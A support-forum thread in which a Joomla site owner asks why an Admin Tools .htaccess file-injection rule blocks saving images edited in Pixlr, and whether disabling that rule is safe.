Support

Hi !

Mandatory information about my setup:

Have I read the related troubleshooter articles above before posting (which pages?)? YES
Have I searched the tickets before posting? YES
Have I read the documentation before posting (which pages?)? YES

Website: www.franckphoto.fr/administrator?v1=1
Joomla! version: 3.1.5
PHP version: 5.4.6
MySQL version: 5.1.66-0+squeeze1-log
Host: OVH
Admin Tools version: 2.5.8

Description of my issue:

First, thanks for the fantastic job on Akeeba and Admintools
Can't work without them both.

My problem: I'm now using .htaccess maker on all my sites for security reasons.
The problem is that if I do, then when I use Pixlr to transform images, I have the following error appearing:

'
403 FORBIDDEN
Forbidden

You don't have permission to access /administrator/index.php on this server.
'

To use this great picture editor, I usually install the Media Manager 'Asikart Remote Image'. Then, when browsing images, I can just right-click on any image and select 'Edit with Pixlr'. The image is then loaded by Pixlr services. I can do the changes. But if I try to save them, I have the error above mentioned...

I of course tried to generate new .htaccess files with different exceptions on the /administrator/index.php or even on the directory itself. I also tried to disable the Backend protection and other things in the Admintool .htaccess maker.

But I never managed to generate an .htaccess file that does the trick.

If I roll back to the original .htaccess created by Joomla, everything works, so it is necessarily in the optimized .htaccess by Admintools that something is going on...

Could you help me on this?
I would like to avoid rolling back definitively on the original .htaccess as it doesn't sound very secured....


Many thanks in advance,
Dominique

You just need to do a little digging to figure out exactly what file is throwing the 403 error. The way you have it set up is that everything needs to be called through Joomla!'s index.php file. That plugin is being called outside the normal way and it needs to be added as an exception. To find out exactly what needs to be in the execption box, use the instructions here: https://www.akeebabackup.com/documentation/troubleshooter/athtaccessexceptions.html.

Hi,

Thanks for your email, but in the end this didn't really helped me. I already tried plenty of things before writing to you, and did all exceptions trials then. I even disabled the Frontend and the Backend protections: problem was still there....

I tried more things, without trying to understand what was the problematic element via Firebug (it looks like it is index.php !! Please check the url found in Firebug provided below...)

The result of my search is that I have to disable the following option:
'Protect against common file injection attacks'... I can leave all the other options on 'On', but I have to disable this 'Protect against common...'.

What do you think about this? I don't really feel comfortable with disabling this protection... Is it a bad sign? Can this be really a problem? Does it let an 'open door' to the attacks... In a nutshell: what is your advise. If it's not too much a problem, knowing that the rest of the options are 'on', then it would be great as I would really like to use Pixlr...

May be I can add the protections set in the standard Joomla .htaccess in the field 'Custom .htaccess rules at the bottom of the file' as those were not a problem apparently.... Would this be acceptable security wise?

Many thanks in advance for your advise here,

Best
Dominique


FOR YOUR INFO, THE URL FOUND VIA FIREBUG:

'http://www.franckphoto.fr/administrator/index.php?option=com_remoteimage&task=manager&cmd=pixlr&target=l1_RGlhcG9yYW1hX2FjY3VlaWw&node=elfinder&image=http://app8.pixlr.com/_temp/52794cecc6ba5d337d000081.jpg&type=jpg&title=pixlr_VENDANGES%202012%2060&state=replace' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-gb,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: dd00b3e33e80a06d2eefdd87b73394f3=927d2lsfj0j7ftmta459vc4cb7; mailplanBAK=R2555565549; mailplan=R3196047616; 4ffe4719afca3f83f4e5d27fd1adb723=7blo58cacahuhdpak2oofbeta2; __utma=89048396.677514011.1383680086.1383680086.1383680086.1; __utmb=89048396.4.10.1383680086; __utmc=89048396; __utmz=89048396.1383680086.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)' -H 'Host: www.franckphoto.fr' -H 'Referer: http://pixlr.com/editor/?image=http%3A%2F%2Fwww.franckphoto.fr%2Fimages%2FDiaporama_accueil%2FVENDANGES%25202012%252060.jpg&target=http%3A%2F%2Fwww.franckphoto.fr%2Fadministrator%2Findex.php%3Foption%3Dcom_remoteimage%26task%3Dmanager%26cmd%3Dpixlr%26target%3Dl1_RGlhcG9yYW1hX2FjY3VlaWw%26node%3Delfinder&title=pixlr_VENDANGES%202012%2060.jpg&exit=http%3A%2F%2Fwww.franckphoto.fr%2Fadministrator%2Findex.php%3Foption%3Dcom_remoteimage%26task%3Dmanager%26cmd%3Dpixlr' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0'

I would like to ask Nicholas if he has any experience with this extension. I is pretty late in his part of the world now.